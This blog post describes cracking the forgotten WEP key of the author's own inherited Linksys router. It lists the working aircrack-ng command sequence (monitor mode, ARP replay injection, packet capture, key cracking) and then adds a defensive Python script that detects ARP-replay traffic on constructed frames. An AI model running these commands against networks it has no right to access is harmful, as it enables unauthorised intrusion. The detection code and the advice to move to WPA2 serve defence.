
I recently inherited a disused Linksys wireless router. The previous owner had long since forgotten the WEP passphrase. Of course, it's trivial to reset a Linksys router back to the factory defaults, which I would use eventually. But before I did that, I thought I would try something else first...
Having never tried to crack a WEP key before, I thought this would be a nice opportunity to learn how. There are plenty of excellent, detailed tutorials out there. And this blog post isn't one of them.
It's merely a "note to self" -- what worked for me at this point in time. So if you're looking for a detailed explanation of the process or perhaps support in your quest, "These aren't the droids you're looking for. Move along, move along."
First, I created a directory to store the captured packets.

    DIR=$(mktemp -d)
    cd $DIR

I then installed the utilities from the 10.10 archive.

    sudo apt-get install aircrack-ng

Next, I checked my interface.

    sudo airmon-ng check wlan0

And I stopped any services using wlan0 (avahi-daemon, NetworkManager, wpa_supplicant). Then I started monitoring mode on the interface.

    sudo airmon-ng start wlan0

Now, I needed to scan the airwaves, looking for my access point.

    sudo airodump-ng mon0

When I recognized the ESSID I was looking for, I noted the BSSID and Channel number. Then, I started replaying ARP requests.

    sudo aireplay-ng -3 -b $bssid -h 00:00:00:00:00:00 wlan0

I let this run for a while in one window. At the same time, I started capturing replies in another window.

    sudo airodump-ng --channel $channel --bssid $bssid --write dump wlan0

And in a third window, I started analyzing the captured data, looking for the key.

    sudo aircrack-ng *cap

It took about 7500 ARP requests and IVs gathered over ~2 hours to divine the key, but it worked eventually, like a charm!
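The flip side of the procedure above is what it looks like from the access point's owner's side. The ARP replay step works by re-sending one captured, encrypted ARP request over and over so the AP answers each copy with a freshly keyed frame; a byte-identical WEP frame (same IV, same ciphertext) repeated hundreds of times a minute from one station is therefore a clear signature, and the pile of IVs the AP hands back is the raw material the cracker needs. The script below is an added example for monitoring your own network; it is not code from the post or from the aircrack-ng project. It works on a constructed, simplified frame record (timestamp, transmitter, BSSID, IV, hash of the encrypted body) rather than a real capture, and the station addresses, IVs and timings in `constructed_capture()` are made up for the demonstration.

```python
"""Spot the ARP-replay pattern and IV volume on a WEP network (added example).

Assumed, simplified input: one Frame per captured 802.11 data frame. A real
deployment would populate these from a capture file; everything in
constructed_capture() is invented for this demo.
"""
from collections import defaultdict
from dataclasses import dataclass

AP = "00:1a:70:aa:bb:cc"  # constructed BSSID of the monitored access point


@dataclass(frozen=True)
class Frame:
    ts: float       # capture time in seconds
    src: str        # transmitting station MAC
    bssid: str      # BSSID the frame belongs to
    iv: int         # 24-bit WEP initialisation vector from the frame header
    body_sha: str   # hash of the encrypted body (constructed strings here)


def detect_replay(frames, threshold=50, window=10.0):
    """Flag a station that re-sends an identical WEP frame (same IV and body)
    at least `threshold` times inside `window` seconds.

    Legitimate stations advance the IV with every frame, so an exact repeat
    at high rate is the fingerprint of an injection tool replaying a captured
    ARP request. Returns one alert per offending (station, frame) pair.
    """
    seen = defaultdict(list)   # (src, bssid, iv, body_sha) -> recent timestamps
    flagged = set()
    alerts = []
    for f in sorted(frames, key=lambda x: x.ts):
        key = (f.src, f.bssid, f.iv, f.body_sha)
        times = seen[key]
        times.append(f.ts)
        while times and f.ts - times[0] > window:   # slide the window forward
            times.pop(0)
        if len(times) >= threshold and key not in flagged:
            flagged.add(key)
            alerts.append({
                "src": f.src, "bssid": f.bssid, "iv": f"{f.iv:06x}",
                "count": len(times), "first_ts": times[0], "last_ts": f.ts,
            })
    return alerts


def count_ivs(frames, bssid):
    """Return (distinct IVs, total frames) observed for one BSSID.

    WEP's IV is only 24 bits and every frame exposes one, so a fast-growing
    distinct count is exactly the harvest the post describes (~7500 IVs in
    ~2 hours); on a network that should be idle it is a warning sign.
    """
    ivs = {f.iv for f in frames if f.bssid == bssid}
    total = sum(1 for f in frames if f.bssid == bssid)
    return len(ivs), total


def constructed_capture():
    """Invented traffic: one quiet legitimate client, one injecting station
    replaying a single ARP request, and the AP's fresh-IV replies to it."""
    frames = []
    for i in range(30):   # legitimate client, one frame per second, IV advancing
        frames.append(Frame(float(i), "00:11:22:33:44:55", AP, 0x100000 + i, f"legit{i}"))
    for i in range(200):  # injector: the same encrypted ARP request, 50 frames/s
        frames.append(Frame(10.0 + i * 0.02, "00:00:00:00:00:00", AP, 0x0ABCDE, "arp-req"))
    for i in range(200):  # AP answers each copy with a new IV (what the cracker wants)
        frames.append(Frame(10.01 + i * 0.02, AP, AP, 0x200000 + i, f"reply{i}"))
    return frames


if __name__ == "__main__":
    capture = constructed_capture()
    for alert in detect_replay(capture):
        print("replay suspected:", alert)
    distinct, total = count_ivs(capture, AP)
    print(f"{distinct} distinct IVs in {total} frames for {AP}")
```

Only the injecting station trips `detect_replay`; the legitimate client and the AP's replies each carry a new IV per frame and are never flagged. The practical fix the post leaves implicit is the one to take away: the factory reset the author mentions is a chance to move the router to WPA2, after which there are no WEP IVs to harvest at all.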
:-Dustin